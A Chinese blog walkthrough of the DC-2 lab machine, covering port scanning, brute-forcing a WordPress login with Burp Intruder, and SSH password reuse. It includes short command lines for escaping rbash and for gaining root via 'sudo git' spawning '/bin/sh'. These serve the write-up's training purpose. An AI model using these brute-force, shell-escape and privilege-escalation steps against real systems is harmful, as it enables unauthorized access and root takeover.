渗透测试演练 DC-2

DC-2


author:leadlife

data:2023/5/12

blog:https://tripse.github.io/

demonstration:密码复用同时存在于本地登陆情况和外部登陆情况

本次测试使用到的工具如下:

  • 信息收集:nmap,fscan,cmseek,cewl,searchsploit,burpsuite
  • 获取 SHELL:ssh
  • 内部信息收集:无
  • 权限提升:无

外部信息收集

Nmap ICMP 扫描发现主机

其中 IP 10.10.10.129 为靶机 IP

sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 15:12 CST
Nmap scan report for 10.10.10.129
Host is up (0.00018s latency).
MAC Address: 08:00:27:BC:F8:72 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.000041s latency).
MAC Address: 00:50:56:E9:03:7F (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.34 seconds

Fsacn 探测开放端口

sudo fscan -h 10.10.10.129 -t 30 -p 0-65535

image-20230512151407399

Nmap 进行详细端口扫描

得到端口号后,使用 Nmap 进行详细端口扫描

sudo nmap -sS -sV -T4 --min-rate 10000 -oN nmap.all -O -sC 10.10.10.129 -p80,7744
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 15:15 CST
Nmap scan report for 10.10.10.129
Host is up (0.00034s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52517b6e70a4337ad24be10b5a0f9ed7 (DSA)
|   2048 5911d8af38518f41a744b32803809942 (RSA)
|   256 df181d7426cec14f6f2fc12654315191 (ECDSA)
|_  256 d9385f997c0d647e1d46f6e97cc63717 (ED25519)
MAC Address: 08:00:27:BC:F8:72 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds

Hosts 绑定访问 Web

访问 10.10.10.129 发现如下情况,操作 Hosts 文件绑定即可

image-20230512151610918

hosts 文件路径:/etc/hosts,内容编辑如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Q2W02Cfn-1683882464370)(/home/leadlife/.config/Typora/typora-user-images/image-20230512151705988.png)]

操作后即可正常访问,发现 CMS 为 wordpress

image-20230512151902646

CMSeek 判断 CMS 版本&枚举 WP 用户

cmseek 会自动去枚举 wordpress cms 的用户,比 wpscan 用者简单

image-20230512152043830

searchsploit 搜寻 cms 版本漏洞

发现该版本并无直接 RCE 的漏洞:

image-20230512152140944

则考虑爆破 User 进入 wordpress 后台

暴力破解进入后台

直接用 burpsuite,懒得用 wpscan

收集可能密码

首先可以使用 cewl 爬取站点,收集可能密码

cewl http://dc-2/ >> passwd.txt

BurpSuite intruder 爆破

1:首先来到后台 http://dc-2/wp-login.php

image-20230512152736592

2:随意输入,使用 burpsuite 抓到该 POST 数据包

image-20230512152812069

3:发送到 intruder 模块

image-20230512152858562

4:消除自动选定变量,自定义变量使用 Clus ter Bomb 模式爆破

image-20230512153008011

5:选定账号密码开始爆破

image-20230512153116475

image-20230512153213154

爆破结果如下,发现了 tom 和 jerry 的 password

image-20230512153320289

后台获取 WebSHELL

失败

来到 Tom 账户,发现权限过小

image-20230512153558434

转向 jerry ,显然 jerry 账户的权限高很多,能够编辑 Post 和 Pages,但仍然无法操作获得 webshell

image-20230512154355316

密码复用尝试

利用密码服用,尝试能否通过 ssh 登陆目标账户:

  • Tom 可以登陆

image-20230512154555417

  • 再尝试 jerry

image-20230512154640695

jerry 并不存在密码复用情况

内部信息收集

绕过 rbash

发现我们输入命令有些奇怪的提示,得到为 rbash

export -p
BASH_CMDS[test]=/bin/sh;test
/bin/bash
export PATH=$PATH:/bin/ 
export PATH=$PATH:/usr/bin

内核与发行版

发现命令索引有问题,这里直接来到 /bin/ 下调用

image-20230512161340064

SUID

无 SUID

image-20230512161506070

SUDO

无 SUDO

image-20230512161506070

尝试本地利用密码复用切换到 jerry

成功切换

image-20230512164425833

jerry sudo

发现 jerry sudo git 可用于提权

image-20230512164506988

权限提升

利用 git sudo 提权

sudo git branch --help config
!/bin/sh

image-20230512164633546

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
学习web渗透测试的线路可以按照以下步骤进行: 1. 先了解什么是web渗透测试Web渗透测试是指在对目标网站系统信息不知情的情况下,对其进行渗透的过程。可以分为白盒测试和黑盒测试两种方式。白盒测试是在了解目标网站的源码等信息的情况下进行渗透,相当于代码分析审计。而黑盒测试则是在不知道目标网站系统信息的情况下进行渗透。 2. 学习计算机网络的基础知识。计算机网络是web渗透测试的基础,掌握网络协议、抓包和扫描主机开放的其他服务端口等技术对于渗透测试至关重要。推荐学习《计算机网络自顶向下方法》,这本书以一种层层剖析的方式讲解了网络的封装过程,包括常见的问题如TCP握手以及阻塞机制等。 3. 学习渗透测试的工具和技术。了解并掌握常用的渗透测试工具,如Nmap、Metasploit、Burp Suite等,以及相关的技术,如XSS、SQL注入、漏洞利用等。通过实践和实际操作,加深对这些工具和技术的理解和掌握。 4. 深入学习web应用安全知识。了解常见的web漏洞类型,如跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、SQL注入等,并学习相应的防御措施。熟悉常用的web框架和安全配置,加强对web应用安全的理解和实践。 5. 参与实际的渗透测试项目。通过参与实际的渗透测试项目,不断积累经验和提升技能。可以通过参加CTF比赛、模拟演练或者找到相关的实习机会来锻炼自己的能力。 总结起来,学习web渗透测试的线路包括了了解渗透测试的基本概念,学习计算机网络基础知识,掌握渗透测试工具和技术,深入学习web应用安全知识,并参与实际的渗透测试项目。通过这些步骤的学习和实践,可以逐渐提升自己在web渗透测试领域的能力和水平。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [web渗透测试学习路线](https://blog.csdn.net/2302_77844491/article/details/131147129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全测试工程师】超实用的Web渗透测试学习路线~](https://blog.csdn.net/weixin_44433834/article/details/119330778)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LeadlifeSec0x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值